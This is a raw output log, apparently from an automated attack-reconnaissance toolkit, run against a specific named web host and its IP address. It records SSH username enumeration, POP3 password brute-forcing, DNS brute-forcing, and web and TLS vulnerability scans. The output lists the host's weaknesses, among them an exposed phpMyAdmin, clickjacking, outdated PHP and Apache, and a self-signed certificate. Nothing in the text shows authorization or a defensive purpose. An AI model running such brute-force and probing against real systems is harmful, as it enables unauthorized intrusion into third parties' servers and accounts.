- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- [*] Processing /root/.msf4/msfconsole.rc for ERB directives.
- resource (/root/.msf4/msfconsole.rc)> “spool /root/msf_console.log”
- [-] Unknown command: “spool.
- USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
- RHOSTS => euro.fashionmod.biz
- [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
- RHOST => euro.fashionmod.biz
- [*] 80.82.69.63:22 - SSH - Checking for false positives
- [*] 80.82.69.63:22 - SSH - Starting scan
- [-] 80.82.69.63:22 - SSH - User 'admin' not found
- [-] 80.82.69.63:22 - SSH - User 'administrator' not found
- [-] 80.82.69.63:22 - SSH - User 'anonymous' not found
- [-] 80.82.69.63:22 - SSH - User 'backup' not found
- [-] 80.82.69.63:22 - SSH - User 'bee' not found
- [-] 80.82.69.63:22 - SSH - User 'ftp' not found
- [-] 80.82.69.63:22 - SSH - User 'guest' not found
- [-] 80.82.69.63:22 - SSH - User 'GUEST' not found
- [-] 80.82.69.63:22 - SSH - User 'info' not found
- [-] 80.82.69.63:22 - SSH - User 'mail' not found
- [-] 80.82.69.63:22 - SSH - User 'mailadmin' not found
- [-] 80.82.69.63:22 - SSH - User 'msfadmin' not found
- [-] 80.82.69.63:22 - SSH - User 'mysql' not found
- [-] 80.82.69.63:22 - SSH - User 'nobody' not found
- [-] 80.82.69.63:22 - SSH - User 'oracle' not found
- [-] 80.82.69.63:22 - SSH - User 'owaspbwa' not found
- [-] 80.82.69.63:22 - SSH - User 'postfix' not found
- [-] 80.82.69.63:22 - SSH - User 'postgres' not found
- [-] 80.82.69.63:22 - SSH - User 'private' not found
- [-] 80.82.69.63:22 - SSH - User 'proftpd' not found
- [-] 80.82.69.63:22 - SSH - User 'public' not found
- [-] 80.82.69.63:22 - SSH - User 'root' not found
- [-] 80.82.69.63:22 - SSH - User 'superadmin' not found
- [-] 80.82.69.63:22 - SSH - User 'support' not found
- [-] 80.82.69.63:22 - SSH - User 'sys' not found
- [-] 80.82.69.63:22 - SSH - User 'system' not found
- [-] 80.82.69.63:22 - SSH - User 'systemadmin' not found
- [-] 80.82.69.63:22 - SSH - User 'systemadministrator' not found
- [-] 80.82.69.63:22 - SSH - User 'test' not found
- [-] 80.82.69.63:22 - SSH - User 'tomcat' not found
- [-] 80.82.69.63:22 - SSH - User 'user' not found
- [-] 80.82.69.63:22 - SSH - User 'webmaster' not found
- [-] 80.82.69.63:22 - SSH - User 'www-data' not found
- [-] 80.82.69.63:22 - SSH - User 'Fortimanager_Access' not found
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
- [+] 80.82.69.63:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )
- [*] euro.fashionmod.biz:22 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 53 opened... running tests...
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 17:35 EDT
- Nmap scan report for euro.fashionmod.biz (80.82.69.63)
- Host is up (0.14s latency).
- rDNS record for 80.82.69.63: jademonitor.net
- PORT STATE SERVICE VERSION
- 53/udp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
- |_dns-cache-snoop: 0 of 100 tested domains are cached.
- |_dns-fuzz: The server seems impervious to our assault.
- | dns-nsec-enum:
- |_ No NSEC records found
- | dns-nsec3-enum:
- |_ DNSSEC NSEC3 not supported
- | dns-nsid:
- |_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.62.rc1.el6_9.4
- Too many fingerprints match this host to give specific OS details
- Network Distance: 10 hops
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel:6
- Host script results:
- | dns-brute:
- | DNS Brute-force hostnames:
- | mail.fashionmod.biz - 80.82.69.63
- | www.fashionmod.biz - 80.82.69.63
- | ftp.fashionmod.biz - 80.82.69.63
- |_ smtp.fashionmod.biz - 80.82.69.63
- TRACEROUTE (using port 53/udp)
- HOP RTT ADDRESS
- 1 110.82 ms 10.13.0.1
- 2 ...
- 3 111.41 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
- 4 112.21 ms 10.95.33.8
- 5 120.22 ms be100-1109.fra-1-a9.de.eu (213.186.32.213)
- 6 ...
- 7 125.48 ms vlan3555.bb1.ams2.nl.m247.com (176.10.83.128)
- 8 121.50 ms 176.10.83.119
- 9 ...
- 10 121.74 ms jademonitor.net (80.82.69.63)
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 614.12 seconds
- + -- --=[Port 79 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- + -- ----------------------------=[Checking for WAF]=------------------------ -- +
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://euro.fashionmod.biz
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 13
- + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
- http://euro.fashionmod.biz [200 OK] Apache[2], Country[NETHERLANDS][NL], HTML5, HTTPServer[Apache/2], IP[80.82.69.63], JQuery[1.4.3], Script[JavaScript,text/javascript], Title[Euro Idols - Nonude Video Models from Europe !]
- __ ______ _____
- \ \/ / ___|_ _|
- \ /\___ \ | |
- / \ ___) || |
- /_/\_|____/ |_|
- + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
- + -- --=[Target: euro.fashionmod.biz:80
- + -- --=[Site not vulnerable to Cross-Site Tracing!
- + -- --=[Site not vulnerable to Host Header Injection!
- + -- --=[Site vulnerable to Cross-Frame Scripting!
- + -- --=[Site vulnerable to Clickjacking!
- HTTP/1.1 400 Bad Request
- Date: Fri, 29 Sep 2017 21:52:40 GMT
- Server: Apache/2
- Accept-Ranges: bytes
- Vary: Accept-Encoding,User-Agent
- Connection: close
- Content-Type: text/html
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <HTML><HEAD>
- <TITLE>400 Bad Request</TITLE>
- </HEAD><BODY>
- <H1>Bad Request</H1>
- There was an error in your request.
- <HR>
- <I>(none)</I>
- </BODY></HTML>
- HTTP/1.1 400 Bad Request
- Date: Fri, 29 Sep 2017 21:52:40 GMT
- Server: Apache/2
- Accept-Ranges: bytes
- Vary: Accept-Encoding,User-Agent
- Connection: close
- Content-Type: text/html
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <HTML><HEAD>
- <TITLE>400 Bad Request</TITLE>
- </HEAD><BODY>
- <H1>Bad Request</H1>
- There was an error in your request.
- <HR>
- <I>(none)</I>
- </BODY></HTML>
- + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
- + -- --=[Checking if X-Content options are enabled on euro.fashionmod.biz...
- + -- --=[Checking if X-Frame options are enabled on euro.fashionmod.biz...
- + -- --=[Checking if X-XSS-Protection header is enabled on euro.fashionmod.biz...
- + -- --=[Checking HTTP methods on euro.fashionmod.biz...
- Allow: POST,OPTIONS,HEAD,GET
- + -- --=[Checking if TRACE method is enabled on euro.fashionmod.biz...
- + -- --=[Checking for META tags on euro.fashionmod.biz...
- <meta charset="UTF-8" />
- + -- --=[Checking for open proxy on euro.fashionmod.biz...
- <tr><td>To change this page, upload your website into the public_html directory</td></tr>
- <tr><td><img src="logo.png"></td></tr>
- <tr><td style="font-size: 8pt">Date Created: Wed May 13 17:45:58 2015</td></tr>
- </table>
- <br><br>
- </center>
- </body>
- </html>
- + -- --=[Enumerating software on euro.fashionmod.biz...
- Server: Apache/2
- + -- --=[Checking if Strict-Transport-Security is enabled on euro.fashionmod.biz...
- + -- --=[Checking for Flash cross-domain policy on euro.fashionmod.biz...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /crossdomain.xml was not found on this server.</p>
- <p>Additionally, a 404 Not Found
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- </body></html>
- + -- --=[Checking for Silverlight cross-domain policy on euro.fashionmod.biz...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
- <p>Additionally, a 404 Not Found
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- </body></html>
- + -- --=[Checking for HTML5 cross-origin resource sharing on euro.fashionmod.biz...
- + -- --=[Retrieving robots.txt on euro.fashionmod.biz...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /robots.txt was not found on this server.</p>
- <p>Additionally, a 404 Not Found
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- </body></html>
- + -- --=[Retrieving sitemap.xml on euro.fashionmod.biz...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /sitemap.xml was not found on this server.</p>
- <p>Additionally, a 404 Not Found
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- </body></html>
- + -- --=[Checking cookie attributes on euro.fashionmod.biz...
- + -- --=[Checking for ASP.NET Detailed Errors on euro.fashionmod.biz...
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 80.82.69.63
- + Target Hostname: euro.fashionmod.biz
- + Target Port: 80
- + Start Time: 2017-09-29 17:46:19 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: Apache/2
- + Server leaks inodes via ETags, header found with file /, fields: 0x113c 0x4b83c787f4d80
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Apache/2 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
- + Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
- + Retrieved x-powered-by header: PHP/5.3.29
- + Uncommon header 'x-ob_mode' found, with contents: 1
- + OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- + OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- + OSVDB-3092: /pma/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- + Cookie SQMSESSID created without the httponly flag
- + OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMail found
- + OSVDB-3093: /webmail/src/read_body.php: SquirrelMail found
- + OSVDB-3268: /icons/: Directory indexing found.
- + OSVDB-3233: /icons/README: Apache default file found.
- + /webmail/src/configtest.php: Squirrelmail configuration test may reveal version and system info.
- + 8470 requests: 5 error(s) and 17 item(s) reported on remote host
- + End Time: 2017-09-29 18:06:20 (GMT-4) (1201 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
- [+] Screenshot saved to /usr/share/sniper/loot/screenshots/euro.fashionmod.biz-port80.jpg
- + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
- + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
- _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
- (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
- (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
- \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
- \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
- /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
- [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
- __[ ! ] Neither war between hackers, nor peace for the system.
- __[ ! ] http://blog.inurl.com.br
- __[ ! ] http://fb.com/InurlBrasil
- __[ ! ] http://twitter.com/@googleinurl
- __[ ! ] http://github.com/googleinurl
- __[ ! ] Current PHP version::[ 7.0.22-3 ]
- __[ ! ] Current script owner::[ root ]
- __[ ! ] Current uname::[ Linux Kali 4.12.0-kali2-amd64 #1 SMP Debian 4.12.12-2kali1 (2017-09-13) x86_64 ]
- __[ ! ] Current pwd::[ /usr/share/sniper ]
- __[ ! ] Help: php inurlbr.php --help
- ------------------------------------------------------------------------------------------------------------------------
- [ ! ] Starting SCANNER INURLBR 2.1 at [29-09-2017 18:07:16]
- [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
- It is the end user's responsibility to obey all applicable local, state and federal laws.
- Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-euro.fashionmod.biz.txt ]
- [ INFO ][ DORK ]::[ site:euro.fashionmod.biz ]
- [ INFO ][ SEARCHING ]:: {
- [ INFO ][ ENGINE ]::[ GOOGLE - www.google.tl ]
- [ INFO ][ SEARCHING ]::
- -[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE API ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.fi ID: 002901626849897788481:cpnctza84gq ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
- [ INFO ] Not a satisfactory result was found!
- [ INFO ] [ Shutting down ]
- [ INFO ] [ End of process INURLBR at [29-09-2017 18:07:25]
- [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
- [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-euro.fashionmod.biz.txt ]
- |_________________________________________________________________________________________
- \_________________________________________________________________________________________/
- + -- --=[Port 110 opened... running tests...
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 18:07 EDT
- Nmap scan report for euro.fashionmod.biz (80.82.69.63)
- Host is up (0.13s latency).
- rDNS record for 80.82.69.63: jademonitor.net
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Dovecot DirectAdmin pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 235 guesses in 194 seconds, average tps: 1.2
- |_pop3-capabilities: STLS CAPA TOP SASL(PLAIN) PIPELINING USER RESP-CODES UIDL AUTH-RESP-CODE
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose
- Running: Linux 2.6.X
- OS CPE: cpe:/o:linux:linux_kernel:2.6.39
- OS details: Linux 2.6.39
- Network Distance: 10 hops
- TRACEROUTE (using port 110/tcp)
- HOP RTT ADDRESS
- 1 111.50 ms 10.13.0.1
- 2 111.55 ms 37.187.24.252
- 3 111.54 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
- 4 112.22 ms 10.95.33.8
- 5 120.53 ms be100-1109.fra-1-a9.de.eu (213.186.32.213)
- 6 ...
- 7 222.14 ms vlan3555.bb1.ams2.nl.m247.com (176.10.83.128)
- 8 222.12 ms 176.10.83.119
- 9 ...
- 10 222.12 ms jademonitor.net (80.82.69.63)
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 206.23 seconds
- + -- --=[Port 111 closed... skipping.
- + -- --=[Port 135 closed... skipping.
- + -- --=[Port 139 closed... skipping.
- + -- --=[Port 161 closed... skipping.
- + -- --=[Port 162 closed... skipping.
- + -- --=[Port 389 closed... skipping.
- + -- --=[Port 443 opened... running tests...
- + -- ----------------------------=[Checking for WAF]=------------------------ -- +
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://euro.fashionmod.biz
- ERROR:root:Site https://euro.fashionmod.biz appears to be down
- + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
- ____ _ _ _____ _ _
- / ___| | ___ _ _ __| | ___|_ _(_) |
- | | | |/ _ \| | | |/ _` | |_ / _` | | |
- | |___| | (_) | |_| | (_| | _| (_| | | |
- \____|_|\___/ \__,_|\__,_|_| \__,_|_|_|
- v1.0.1 by m0rtem
- [18:10:54] Initializing CloudFail - the date is: 29/09/2017
- [18:10:54] Fetching initial information from: euro.fashionmod.biz...
- [18:10:54] Server IP: 80.82.69.63
- [18:10:54] Testing if euro.fashionmod.biz is on the Cloudflare network...
- [18:10:54] euro.fashionmod.biz is not part of the Cloudflare network, quitting...
- + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
- https://euro.fashionmod.biz [200 OK] Apache[2][Default], Country[NETHERLANDS][NL], HTTPServer[Apache/2], IP[80.82.69.63]
- + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
- AVAILABLE PLUGINS
- -----------------
- PluginSessionResumption
- PluginOpenSSLCipherSuites
- PluginCertInfo
- PluginHSTS
- PluginHeartbleed
- PluginCompression
- PluginChromeSha1Deprecation
- PluginSessionRenegotiation
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- euro.fashionmod.biz:443 => 80.82.69.63:443
- SCAN RESULTS FOR EURO.FASHIONMOD.BIZ:443 - 80.82.69.63:443
- ----------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: 19ea54ceff0e77b003342b0aaa9ea481f5650116
- Common Name: localhost
- Issuer: localhost
- Serial Number: 831942CF510F668A
- Not Before: Oct 1 09:40:25 2015 GMT
- Not After: Feb 15 09:40:25 2043 GMT
- Signature Algorithm: sha1WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- * Certificate - Trust:
- Hostname Validation: FAILED - Certificate does NOT match euro.fashionmod.biz
- Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: self signed certificate
- Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: self signed certificate
- Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Certificate Chain Received: ['localhost']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- SCAN COMPLETED IN 5.05 S
- ------------------------
- Version: 1.11.10-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Testing SSL server euro.fashionmod.biz on port 443 using SNI name euro.fashionmod.biz
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 256 bits CAMELLIA256-SHA
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 128 bits CAMELLIA128-SHA
- Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
- Accepted TLSv1.2 112 bits DES-CBC3-SHA
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 256 bits CAMELLIA256-SHA
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 128 bits CAMELLIA128-SHA
- Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
- Accepted TLSv1.1 112 bits DES-CBC3-SHA
- Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 256 bits CAMELLIA256-SHA
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 128 bits CAMELLIA128-SHA
- Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
- Accepted TLSv1.0 112 bits DES-CBC3-SHA
- SSL Certificate:
- Signature Algorithm: sha1WithRSAEncryption
- RSA Key Strength: 2048
- Subject: localhost
- Issuer: localhost
- Not valid before: Oct 1 09:40:25 2015 GMT
- Not valid after: Feb 15 09:40:25 2043 GMT
- #######################################################################################################################################
- testssl 2.9dev from https://testssl.sh/dev/
- This program is free software. Distribution and
- modification under GPLv2 permitted.
- USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
- Please file bugs @ https://testssl.sh/bugs/
- #######################################################################################################################################
- Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
- on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
- (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
- Start 2017-09-29 18:11:35 -->> 80.82.69.63:443 (euro.fashionmod.biz) <<--
- rDNS (80.82.69.63): jademonitor.net.
- Service detected: HTTP
- Testing protocols via sockets except SPDY+HTTP2
- SSLv2 not offered (OK)
- SSLv3 not offered (OK)
- TLS 1 offered
- TLS 1.1 offered
- TLS 1.2 offered (OK)
- SPDY/NPN not offered
- HTTP2/ALPN not offered
- Testing ~standard cipher categories
- NULL ciphers (no encryption) not offered (OK)
- Anonymous NULL Ciphers (no authentication) not offered (OK)
- Export ciphers (w/o ADH+NULL) not offered (OK)
- LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
- Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
- Triple DES Ciphers (Medium) offered
- High encryption (AES+Camellia, no AEAD) offered (OK)
- Strong encryption (AEAD ciphers) offered (OK)
- Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4
- PFS is offered (OK) ECDHE-RSA-AES256-GCM-SHA384
- ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
- DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-SHA256
- DHE-RSA-AES256-SHA DHE-RSA-CAMELLIA256-SHA
- ECDHE-RSA-AES128-GCM-SHA256
- ECDHE-RSA-AES128-SHA256 ECDHE-RSA-AES128-SHA
- DHE-RSA-AES128-GCM-SHA256 DHE-RSA-AES128-SHA256
- DHE-RSA-AES128-SHA DHE-RSA-CAMELLIA128-SHA
- Elliptic curves offered: prime256v1
- Testing server preferences
- Has server cipher order? yes (OK)
- Negotiated protocol TLSv1.2
- Negotiated cipher ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
- Cipher order
- TLSv1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA DHE-RSA-CAMELLIA256-SHA
- AES256-SHA CAMELLIA256-SHA ECDHE-RSA-AES128-SHA
- DHE-RSA-AES128-SHA DHE-RSA-CAMELLIA128-SHA AES128-SHA
- CAMELLIA128-SHA ECDHE-RSA-DES-CBC3-SHA EDH-RSA-DES-CBC3-SHA
- DES-CBC3-SHA
- TLSv1.1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA DHE-RSA-CAMELLIA256-SHA
- AES256-SHA CAMELLIA256-SHA ECDHE-RSA-AES128-SHA
- DHE-RSA-AES128-SHA DHE-RSA-CAMELLIA128-SHA AES128-SHA
- CAMELLIA128-SHA ECDHE-RSA-DES-CBC3-SHA EDH-RSA-DES-CBC3-SHA
- DES-CBC3-SHA
- TLSv1.2: ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES256-SHA384
- ECDHE-RSA-AES256-SHA DHE-RSA-AES256-GCM-SHA384
- DHE-RSA-AES256-SHA256 DHE-RSA-AES256-SHA DHE-RSA-CAMELLIA256-SHA
- AES256-GCM-SHA384 AES256-SHA256 AES256-SHA CAMELLIA256-SHA
- ECDHE-RSA-AES128-GCM-SHA256 ECDHE-RSA-AES128-SHA256
- ECDHE-RSA-AES128-SHA DHE-RSA-AES128-GCM-SHA256
- DHE-RSA-AES128-SHA256 DHE-RSA-AES128-SHA DHE-RSA-CAMELLIA128-SHA
- AES128-GCM-SHA256 AES128-SHA256 AES128-SHA CAMELLIA128-SHA
- ECDHE-RSA-DES-CBC3-SHA EDH-RSA-DES-CBC3-SHA DES-CBC3-SHA
- Testing server defaults (Server Hello)
- TLS extensions (standard) "renegotiation info/#65281"
- "EC point formats/#11" "session ticket/#35"
- "heartbeat/#15"
- Session Ticket RFC 5077 hint 300 seconds, session tickets keys seems to be rotated < daily
- SSL Session ID support yes
- Session Resumption Tickets: yes, ID: yes
- TLS clock skew +385 sec from localtime
- Signature Algorithm SHA1 with RSA -- besides: users will receive a strong browser WARNING
- Server key size RSA 2048 bits
- Fingerprint / Serial SHA1 19EA54CEFF0E77B003342B0AAA9EA481F5650116 / 831942CF510F668A
- SHA256 F8DFD09CDE3786DFC7665BA6221BABC67030C5C390F19EA9790DB6B4CB2E5BEC
- Common Name (CN) localhost
- subjectAltName (SAN) missing (NOT ok) -- Browsers are complaining
- Issuer self-signed (NOT ok)
- Trust (hostname) certificate does not match supplied URI (same w/o SNI)
- Chain of trust NOT ok (self signed)
- EV cert (experimental) no
